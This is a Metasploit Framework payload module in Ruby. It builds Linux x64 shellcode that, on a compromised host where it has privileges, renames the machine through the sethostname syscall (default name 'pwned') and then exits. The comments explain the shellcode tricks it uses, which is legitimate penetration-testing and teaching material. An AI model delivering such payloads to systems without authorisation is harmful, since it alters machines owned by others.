rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/linux/x64/set_hostname.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
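# Single-stage Linux x64 payload that calls sethostname(2) with an
# operator-chosen name and then exits.
#
# Changing the host name requires privileges on the target (the module
# declares 'Privileged' => true). Hosts that audit the sethostname syscall
# will record the change.
module MetasploitModule
  CachedSize = 40

  include Msf::Payload::Single
  include Msf::Payload::Linux

  # Registers the module metadata and the HOSTNAME option (default 'pwned').
  #
  # @param info [Hash] module info merged with the defaults below
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Linux Set Hostname',
        'Description' => 'Sets the hostname of the machine.',
        'Author' => 'Muzaffer Umut ŞAHİN <[email protected]>',
        'License' => MSF_LICENSE,
        'Platform' => 'linux',
        'Arch' => ARCH_X64,
        'Privileged' => true
      )
    )

    register_options(
      [
        OptString.new('HOSTNAME', [true, 'The hostname to set.', 'pwned'])
      ]
    )
  end

  # Builds the assembly for the payload and returns the assembled bytes.
  #
  # HOSTNAME is interpolated into the assembly source inside a quoted `db`
  # string, so it is validated first: a quote, backslash or other unexpected
  # character would otherwise change the assembly text rather than just the
  # data bytes.
  #
  # Fails with BadConfig (via fail_with) when HOSTNAME has characters outside
  # the allowed set or is longer than 64 bytes.
  #
  # @param _opts [Hash] unused
  # @return [String] assembled payload
  def generate(_opts = {})
    hostname = (datastore['HOSTNAME'] || 'pwned').gsub(/\s+/, '') # remove all whitespace from hostname.

    # Allow only characters that are safe inside the quoted db string below.
    # \A and \z anchor the whole value, not just one line of it.
    unless hostname.match?(/\A[A-Za-z0-9._-]*\z/)
      fail_with(Msf::Module::Failure::BadConfig, 'HOSTNAME may only contain letters, digits, ".", "-" and "_".')
    end

    # The length is used as a byte offset ([rdi+rsi]) and as the syscall's
    # len argument, so count bytes rather than characters.
    length = hostname.bytesize

    # Linux caps host names at 64 bytes (HOST_NAME_MAX). sethostname(2)
    # returns EINVAL for a longer name, so the payload would do nothing.
    if length > 64
      fail_with(Msf::Module::Failure::BadConfig, 'HOSTNAME must be at most 64 bytes.')
    end

    # Assembly walk-through:
    #  * rax is loaded with 170 (sethostname on x86-64) as the negation of
    #    0xffffffffffffff56, presumably to keep zero bytes out of the encoding.
    #  * `jmp str` / `call end` pushes the address of the db string, which
    #    `pop rdi` then picks up as the first syscall argument.
    #  * rsi receives the name length (second argument).
    #  * The string is stored with a trailing 'A' (0x41). XORing that byte
    #    with 0x41 at run time turns it into a NUL terminator.
    #  * After the syscall the code calls exit(0) (rax = 60, rdi = 0).
    payload = %^
      push 0xffffffffffffff56 ; sethostname() syscall number.
      pop rax
      neg rax
      jmp str

    end:
      push #{length}
      pop rsi
      pop rdi ; rdi points to the hostname string.
      xor byte [rdi+rsi], 0x41
      syscall

      push 60 ; exit() syscall number.
      pop rax
      xor rdi,rdi
      syscall

    str:
      call end
      db "#{hostname}A"
    ^

    Metasm::Shellcode.assemble(Metasm::X64.new, payload).encode_string
  end
end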